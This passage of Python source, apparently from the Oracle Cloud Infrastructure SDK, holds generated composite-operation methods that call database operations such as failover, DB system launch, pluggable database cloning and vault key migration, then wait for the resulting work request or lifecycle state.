The ExternalPluggableDatabaseId `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param oci.database.models.EnableExternalPluggableDatabaseOperationsInsightsDetails enable_external_pluggable_database_operations_insights_details: (required)
Details to enable Operations Insights on the external pluggable database
:param list[str] work_request_states: (optional)
An array of work requests states to wait on. These should be valid values for :py:attr:`~oci.work_requests.models.WorkRequest.status`
Default values are termination states: [STATUS_SUCCEEDED, STATUS_FAILED, STATUS_CANCELED]
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.enable_external_pluggable_database_operations_insights`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.enable_external_pluggable_database_operations_insights(external_pluggable_database_id, enable_external_pluggable_database_operations_insights_details, **operation_kwargs)
work_request_states = work_request_states if work_request_states else oci.waiter._WORK_REQUEST_TERMINATION_STATES
lowered_work_request_states = [w.lower() for w in work_request_states]
work_request_id = operation_result.headers['opc-work-request-id']
try:
waiter_result = oci.wait_until(
self._work_request_client,
self._work_request_client.get_work_request(work_request_id),
evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_work_request_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def fail_over_autonomous_database_and_wait_for_work_request(self, autonomous_database_id, work_request_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.fail_over_autonomous_database` and waits for the oci.work_requests.models.WorkRequest
to enter the given state(s).
:param str autonomous_database_id: (required)
The database `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param list[str] work_request_states: (optional)
An array of work requests states to wait on. These should be valid values for :py:attr:`~oci.work_requests.models.WorkRequest.status`
Default values are termination states: [STATUS_SUCCEEDED, STATUS_FAILED, STATUS_CANCELED]
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.fail_over_autonomous_database`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.fail_over_autonomous_database(autonomous_database_id, **operation_kwargs)
work_request_states = work_request_states if work_request_states else oci.waiter._WORK_REQUEST_TERMINATION_STATES
lowered_work_request_states = [w.lower() for w in work_request_states]
work_request_id = operation_result.headers['opc-work-request-id']
try:
waiter_result = oci.wait_until(
self._work_request_client,
self._work_request_client.get_work_request(work_request_id),
evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_work_request_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def fail_over_autonomous_database_and_wait_for_state(self, autonomous_database_id, wait_for_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.fail_over_autonomous_database` and waits for the :py:class:`~oci.database.models.AutonomousDatabase` acted upon
to enter the given state(s).
:param str autonomous_database_id: (required)
The database `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param list[str] wait_for_states:
An array of states to wait on. These should be valid values for :py:attr:`~oci.database.models.AutonomousDatabase.lifecycle_state`
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.fail_over_autonomous_database`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.fail_over_autonomous_database(autonomous_database_id, **operation_kwargs)
if not wait_for_states:
return operation_result
lowered_wait_for_states = [w.lower() for w in wait_for_states]
wait_for_resource_id = operation_result.data.id
try:
waiter_result = oci.wait_until(
self.client,
self.client.get_autonomous_database(wait_for_resource_id),
evaluate_response=lambda r: getattr(r.data, 'lifecycle_state') and getattr(r.data, 'lifecycle_state').lower() in lowered_wait_for_states,
**waiter_kwargs
)
result_to_return = waiter_result
return result_to_return
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def failover_autonomous_container_database_dataguard_association_and_wait_for_work_request(self, autonomous_container_database_id, autonomous_container_database_dataguard_association_id, work_request_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.failover_autonomous_container_database_dataguard_association` and waits for the oci.work_requests.models.WorkRequest
to enter the given state(s).
:param str autonomous_container_database_id: (required)
The Autonomous Container Database `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param str autonomous_container_database_dataguard_association_id: (required)
The Autonomous Container Database-Autonomous Data Guard association `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param list[str] work_request_states: (optional)
An array of work requests states to wait on. These should be valid values for :py:attr:`~oci.work_requests.models.WorkRequest.status`
Default values are termination states: [STATUS_SUCCEEDED, STATUS_FAILED, STATUS_CANCELED]
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.failover_autonomous_container_database_dataguard_association`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.failover_autonomous_container_database_dataguard_association(autonomous_container_database_id, autonomous_container_database_dataguard_association_id, **operation_kwargs)
work_request_states = work_request_states if work_request_states else oci.waiter._WORK_REQUEST_TERMINATION_STATES
lowered_work_request_states = [w.lower() for w in work_request_states]
work_request_id = operation_result.headers['opc-work-request-id']
try:
waiter_result = oci.wait_until(
self._work_request_client,
self._work_request_client.get_work_request(work_request_id),
evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_work_request_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def failover_autonomous_container_database_dataguard_association_and_wait_for_state(self, autonomous_container_database_id, autonomous_container_database_dataguard_association_id, wait_for_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.failover_autonomous_container_database_dataguard_association` and waits for the :py:class:`~oci.database.models.AutonomousContainerDatabaseDataguardAssociation` acted upon
to enter the given state(s).
:param str autonomous_container_database_id: (required)
The Autonomous Container Database `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param str autonomous_container_database_dataguard_association_id: (required)
The Autonomous Container Database-Autonomous Data Guard association `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param list[str] wait_for_states:
An array of states to wait on. These should be valid values for :py:attr:`~oci.database.models.AutonomousContainerDatabaseDataguardAssociation.lifecycle_state`
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.failover_autonomous_container_database_dataguard_association`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.failover_autonomous_container_database_dataguard_association(autonomous_container_database_id, autonomous_container_database_dataguard_association_id, **operation_kwargs)
if not wait_for_states:
return operation_result
lowered_wait_for_states = [w.lower() for w in wait_for_states]
wait_for_resource_id = operation_result.data.id
try:
waiter_result = oci.wait_until(
self.client,
self.client.get_autonomous_container_database_dataguard_association(wait_for_resource_id),
evaluate_response=lambda r: getattr(r.data, 'lifecycle_state') and getattr(r.data, 'lifecycle_state').lower() in lowered_wait_for_states,
**waiter_kwargs
)
result_to_return = waiter_result
return result_to_return
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def failover_data_guard_association_and_wait_for_work_request(self, database_id, data_guard_association_id, failover_data_guard_association_details, work_request_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.failover_data_guard_association` and waits for the oci.work_requests.models.WorkRequest
to enter the given state(s).
:param str database_id: (required)
The database `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param str data_guard_association_id: (required)
The Data Guard association's `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param oci.database.models.FailoverDataGuardAssociationDetails failover_data_guard_association_details: (required)
A request to perform a failover, transitioning a standby database into a primary database.
:param list[str] work_request_states: (optional)
An array of work requests states to wait on. These should be valid values for :py:attr:`~oci.work_requests.models.WorkRequest.status`
Default values are termination states: [STATUS_SUCCEEDED, STATUS_FAILED, STATUS_CANCELED]
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.failover_data_guard_association`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.failover_data_guard_association(database_id, data_guard_association_id, failover_data_guard_association_details, **operation_kwargs)
work_request_states = work_request_states if work_request_states else oci.waiter._WORK_REQUEST_TERMINATION_STATES
lowered_work_request_states = [w.lower() for w in work_request_states]
work_request_id = operation_result.headers['opc-work-request-id']
try:
waiter_result = oci.wait_until(
self._work_request_client,
self._work_request_client.get_work_request(work_request_id),
evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_work_request_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def failover_data_guard_association_and_wait_for_state(self, database_id, data_guard_association_id, failover_data_guard_association_details, wait_for_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.failover_data_guard_association` and waits for the :py:class:`~oci.database.models.DataGuardAssociation` acted upon
to enter the given state(s).
:param str database_id: (required)
The database `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param str data_guard_association_id: (required)
The Data Guard association's `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param oci.database.models.FailoverDataGuardAssociationDetails failover_data_guard_association_details: (required)
A request to perform a failover, transitioning a standby database into a primary database.
:param list[str] wait_for_states:
An array of states to wait on. These should be valid values for :py:attr:`~oci.database.models.DataGuardAssociation.lifecycle_state`
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.failover_data_guard_association`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.failover_data_guard_association(database_id, data_guard_association_id, failover_data_guard_association_details, **operation_kwargs)
if not wait_for_states:
return operation_result
lowered_wait_for_states = [w.lower() for w in wait_for_states]
wait_for_resource_id = operation_result.data.id
try:
waiter_result = oci.wait_until(
self.client,
self.client.get_data_guard_association(wait_for_resource_id),
evaluate_response=lambda r: getattr(r.data, 'lifecycle_state') and getattr(r.data, 'lifecycle_state').lower() in lowered_wait_for_states,
**waiter_kwargs
)
result_to_return = waiter_result
return result_to_return
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def launch_autonomous_exadata_infrastructure_and_wait_for_work_request(self, launch_autonomous_exadata_infrastructure_details, work_request_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.launch_autonomous_exadata_infrastructure` and waits for the oci.work_requests.models.WorkRequest
to enter the given state(s).
:param oci.database.models.LaunchAutonomousExadataInfrastructureDetails launch_autonomous_exadata_infrastructure_details: (required)
Request to create an Autonomous Exadata Infrastructure resource.
:param list[str] work_request_states: (optional)
An array of work requests states to wait on. These should be valid values for :py:attr:`~oci.work_requests.models.WorkRequest.status`
Default values are termination states: [STATUS_SUCCEEDED, STATUS_FAILED, STATUS_CANCELED]
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.launch_autonomous_exadata_infrastructure`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.launch_autonomous_exadata_infrastructure(launch_autonomous_exadata_infrastructure_details, **operation_kwargs)
work_request_states = work_request_states if work_request_states else oci.waiter._WORK_REQUEST_TERMINATION_STATES
lowered_work_request_states = [w.lower() for w in work_request_states]
work_request_id = operation_result.headers['opc-work-request-id']
try:
waiter_result = oci.wait_until(
self._work_request_client,
self._work_request_client.get_work_request(work_request_id),
evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_work_request_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def launch_autonomous_exadata_infrastructure_and_wait_for_state(self, launch_autonomous_exadata_infrastructure_details, wait_for_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.launch_autonomous_exadata_infrastructure` and waits for the :py:class:`~oci.database.models.AutonomousExadataInfrastructure` acted upon
to enter the given state(s).
:param oci.database.models.LaunchAutonomousExadataInfrastructureDetails launch_autonomous_exadata_infrastructure_details: (required)
Request to create an Autonomous Exadata Infrastructure resource.
:param list[str] wait_for_states:
An array of states to wait on. These should be valid values for :py:attr:`~oci.database.models.AutonomousExadataInfrastructure.lifecycle_state`
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.launch_autonomous_exadata_infrastructure`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.launch_autonomous_exadata_infrastructure(launch_autonomous_exadata_infrastructure_details, **operation_kwargs)
if not wait_for_states:
return operation_result
lowered_wait_for_states = [w.lower() for w in wait_for_states]
wait_for_resource_id = operation_result.data.id
try:
waiter_result = oci.wait_until(
self.client,
self.client.get_autonomous_exadata_infrastructure(wait_for_resource_id),
evaluate_response=lambda r: getattr(r.data, 'lifecycle_state') and getattr(r.data, 'lifecycle_state').lower() in lowered_wait_for_states,
**waiter_kwargs
)
result_to_return = waiter_result
return result_to_return
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def launch_db_system_and_wait_for_work_request(self, launch_db_system_details, work_request_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.launch_db_system` and waits for the oci.work_requests.models.WorkRequest
to enter the given state(s).
:param oci.database.models.LaunchDbSystemBase launch_db_system_details: (required)
Request to launch a DB system.
**Note:** Deprecated for Exadata Cloud Service systems. Use the `new resource model APIs`__ instead.
For Exadata Cloud Service instances, support for this API will end on May 15th, 2021. See `Switching an Exadata DB System to the New Resource Model and APIs`__ for details on converting existing Exadata DB systems to the new resource model.
__ https://docs.cloud.oracle.com/iaas/Content/Database/Concepts/exaflexsystem.htm#exaflexsystem_topic-resource_model
__ https://docs.cloud.oracle.com/iaas/Content/Database/Concepts/exaflexsystem_topic-resource_model_conversion.htm
:param list[str] work_request_states: (optional)
An array of work requests states to wait on. These should be valid values for :py:attr:`~oci.work_requests.models.WorkRequest.status`
Default values are termination states: [STATUS_SUCCEEDED, STATUS_FAILED, STATUS_CANCELED]
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.launch_db_system`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.launch_db_system(launch_db_system_details, **operation_kwargs)
work_request_states = work_request_states if work_request_states else oci.waiter._WORK_REQUEST_TERMINATION_STATES
lowered_work_request_states = [w.lower() for w in work_request_states]
work_request_id = operation_result.headers['opc-work-request-id']
try:
waiter_result = oci.wait_until(
self._work_request_client,
self._work_request_client.get_work_request(work_request_id),
evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_work_request_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def launch_db_system_and_wait_for_state(self, launch_db_system_details, wait_for_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.launch_db_system` and waits for the :py:class:`~oci.database.models.DbSystem` acted upon
to enter the given state(s).
:param oci.database.models.LaunchDbSystemBase launch_db_system_details: (required)
Request to launch a DB system.
**Note:** Deprecated for Exadata Cloud Service systems. Use the `new resource model APIs`__ instead.
For Exadata Cloud Service instances, support for this API will end on May 15th, 2021. See `Switching an Exadata DB System to the New Resource Model and APIs`__ for details on converting existing Exadata DB systems to the new resource model.
__ https://docs.cloud.oracle.com/iaas/Content/Database/Concepts/exaflexsystem.htm#exaflexsystem_topic-resource_model
__ https://docs.cloud.oracle.com/iaas/Content/Database/Concepts/exaflexsystem_topic-resource_model_conversion.htm
:param list[str] wait_for_states:
An array of states to wait on. These should be valid values for :py:attr:`~oci.database.models.DbSystem.lifecycle_state`
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.launch_db_system`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.launch_db_system(launch_db_system_details, **operation_kwargs)
if not wait_for_states:
return operation_result
lowered_wait_for_states = [w.lower() for w in wait_for_states]
wait_for_resource_id = operation_result.data.id
try:
waiter_result = oci.wait_until(
self.client,
self.client.get_db_system(wait_for_resource_id),
evaluate_response=lambda r: getattr(r.data, 'lifecycle_state') and getattr(r.data, 'lifecycle_state').lower() in lowered_wait_for_states,
**waiter_kwargs
)
result_to_return = waiter_result
return result_to_return
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def local_clone_pluggable_database_and_wait_for_work_request(self, local_clone_pluggable_database_details, pluggable_database_id, work_request_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.local_clone_pluggable_database` and waits for the oci.work_requests.models.WorkRequest
to enter the given state(s).
:param oci.database.models.LocalClonePluggableDatabaseDetails local_clone_pluggable_database_details: (required)
Request to clone a pluggable database locally.
:param str pluggable_database_id: (required)
The database `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param list[str] work_request_states: (optional)
An array of work requests states to wait on. These should be valid values for :py:attr:`~oci.work_requests.models.WorkRequest.status`
Default values are termination states: [STATUS_SUCCEEDED, STATUS_FAILED, STATUS_CANCELED]
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.local_clone_pluggable_database`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.local_clone_pluggable_database(local_clone_pluggable_database_details, pluggable_database_id, **operation_kwargs)
work_request_states = work_request_states if work_request_states else oci.waiter._WORK_REQUEST_TERMINATION_STATES
lowered_work_request_states = [w.lower() for w in work_request_states]
work_request_id = operation_result.headers['opc-work-request-id']
try:
waiter_result = oci.wait_until(
self._work_request_client,
self._work_request_client.get_work_request(work_request_id),
evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_work_request_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def local_clone_pluggable_database_and_wait_for_state(self, local_clone_pluggable_database_details, pluggable_database_id, wait_for_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.local_clone_pluggable_database` and waits for the :py:class:`~oci.database.models.PluggableDatabase` acted upon
to enter the given state(s).
:param oci.database.models.LocalClonePluggableDatabaseDetails local_clone_pluggable_database_details: (required)
Request to clone a pluggable database locally.
:param str pluggable_database_id: (required)
The database `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param list[str] wait_for_states:
An array of states to wait on. These should be valid values for :py:attr:`~oci.database.models.PluggableDatabase.lifecycle_state`
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.local_clone_pluggable_database`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.local_clone_pluggable_database(local_clone_pluggable_database_details, pluggable_database_id, **operation_kwargs)
if not wait_for_states:
return operation_result
lowered_wait_for_states = [w.lower() for w in wait_for_states]
wait_for_resource_id = operation_result.data.id
try:
waiter_result = oci.wait_until(
self.client,
self.client.get_pluggable_database(wait_for_resource_id),
evaluate_response=lambda r: getattr(r.data, 'lifecycle_state') and getattr(r.data, 'lifecycle_state').lower() in lowered_wait_for_states,
**waiter_kwargs
)
result_to_return = waiter_result
return result_to_return
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def migrate_exadata_db_system_resource_model_and_wait_for_work_request(self, db_system_id, work_request_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.migrate_exadata_db_system_resource_model` and waits for the oci.work_requests.models.WorkRequest
to enter the given state(s).
:param str db_system_id: (required)
The DB system `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param list[str] work_request_states: (optional)
An array of work requests states to wait on. These should be valid values for :py:attr:`~oci.work_requests.models.WorkRequest.status`
Default values are termination states: [STATUS_SUCCEEDED, STATUS_FAILED, STATUS_CANCELED]
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.migrate_exadata_db_system_resource_model`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.migrate_exadata_db_system_resource_model(db_system_id, **operation_kwargs)
work_request_states = work_request_states if work_request_states else oci.waiter._WORK_REQUEST_TERMINATION_STATES
lowered_work_request_states = [w.lower() for w in work_request_states]
work_request_id = operation_result.headers['opc-work-request-id']
try:
waiter_result = oci.wait_until(
self._work_request_client,
self._work_request_client.get_work_request(work_request_id),
evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_work_request_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def migrate_vault_key_and_wait_for_work_request(self, database_id, migrate_vault_key_details, work_request_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.migrate_vault_key` and waits for the oci.work_requests.models.WorkRequest
to enter the given state(s).
:param str database_id: (required)
The database `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param oci.database.models.MigrateVaultKeyDetails migrate_vault_key_details: (required)
Request to change the source of the encryption key for the database.
:param list[str] work_request_states: (optional)
An array of work requests states to wait on. These should be valid values for :py:attr:`~oci.work_requests.models.WorkRequest.status`
Default values are termination states: [STATUS_SUCCEEDED, STATUS_FAILED, STATUS_CANCELED]
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.migrate_vault_key`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.migrate_vault_key(database_id, migrate_vault_key_details, **operation_kwargs)
work_request_states = work_request_states if work_request_states else oci.waiter._WORK_REQUEST_TERMINATION_STATES
lowered_work_request_states = [w.lower() for w in work_request_states]
work_request_id = operation_result.headers['opc-work-request-id']
try:
waiter_result = oci.wait_until(
self._work_request_client,
self._work_request_client.get_work_request(work_request_id),
evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_work_request_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def migrate_vault_key_and_wait_for_state(self, database_id, migrate_vault_key_details, wait_for_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.migrate_vault_key` and waits for the :py:class:`~oci.database.models.Database` acted upon
to enter the given state(s).
:param str database_id: (required)
The database `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param oci.database.models.MigrateVaultKeyDetails migrate_vault_key_details: (required)
Request to change the source of the encryption key for the database.
:param list[str] wait_for_states:
An array of states to wait on. These should be valid values for :py:attr:`~oci.database.models.Database.lifecycle_state`
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.migrate_vault_key`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.migrate_vault_key(database_id, migrate_vault_key_details, **operation_kwargs)
if not wait_for_states:
return operation_result
lowered_wait_for_states = [w.lower() for w in wait_for_states]
wait_for_resource_id = operation_result.data.id
try:
waiter_result = oci.wait_until(
self.client,
self.client.get_database(wait_for_resource_id),
evaluate_response=lambda r: getattr(r.data, 'lifecycle_state') and getattr(r.data, 'lifecycle_state').lower() in lowered_wait_for_states,
**waiter_kwargs
)
result_to_return = waiter_result
return result_to_return
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def modify_database_management_and_wait_for_work_request(self, database_id, modify_database_management_details, work_request_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.modify_database_management` and waits for the oci.work_requests.models.WorkRequest
to enter the given state(s).
:param str database_id: (required)
The database `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param oci.database.models.ModifyDatabaseManagementDetails modify_database_management_details: (required)
The data to update one or more attributes of the Database Management Service for the database.
:param list[str] work_request_states: (optional)
An array of work requests states to wait on. These should be valid values for :py:attr:`~oci.work_requests.models.WorkRequest.status`
Default values are termination states: [STATUS_SUCCEEDED, STATUS_FAILED, STATUS_CANCELED]
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.modify_database_management`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds``
as dictionary keys to modify how long the waiter function will wait between retries and the maximum amount of time it will wait
"""
operation_result = self.client.modify_database_management(database_id, modify_database_management_details, **operation_kwargs)
work_request_states = work_request_states if work_request_states else oci.waiter._WORK_REQUEST_TERMINATION_STATES
lowered_work_request_states = [w.lower() for w in work_request_states]
work_request_id = operation_result.headers['opc-work-request-id']
try:
waiter_result = oci.wait_until(
self._work_request_client,
self._work_request_client.get_work_request(work_request_id),
evaluate_response=lambda r: getattr(r.data, 'status') and getattr(r.data, 'status').lower() in lowered_work_request_states,
**waiter_kwargs
)
return waiter_result
except Exception as e:
raise oci.exceptions.CompositeOperationError(partial_results=[operation_result], cause=e)
def modify_database_management_and_wait_for_state(self, database_id, modify_database_management_details, wait_for_states=[], operation_kwargs={}, waiter_kwargs={}):
"""
Calls :py:func:`~oci.database.DatabaseClient.modify_database_management` and waits for the :py:class:`~oci.database.models.Database` acted upon
to enter the given state(s).
:param str database_id: (required)
The database `OCID`__.
__ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm
:param oci.database.models.ModifyDatabaseManagementDetails modify_database_management_details: (required)
The data to update one or more attributes of the Database Management Service for the database.
:param list[str] wait_for_states:
An array of states to wait on. These should be valid values for :py:attr:`~oci.database.models.Database.lifecycle_state`
:param dict operation_kwargs:
A dictionary of keyword arguments to pass to :py:func:`~oci.database.DatabaseClient.modify_database_management`
:param dict waiter_kwargs:
A dictionary of keyword arguments to pass to the :py:func:`oci.wait_until` function. For example, you could pass ``max_interval_seconds`` or ``max_interval_seconds``
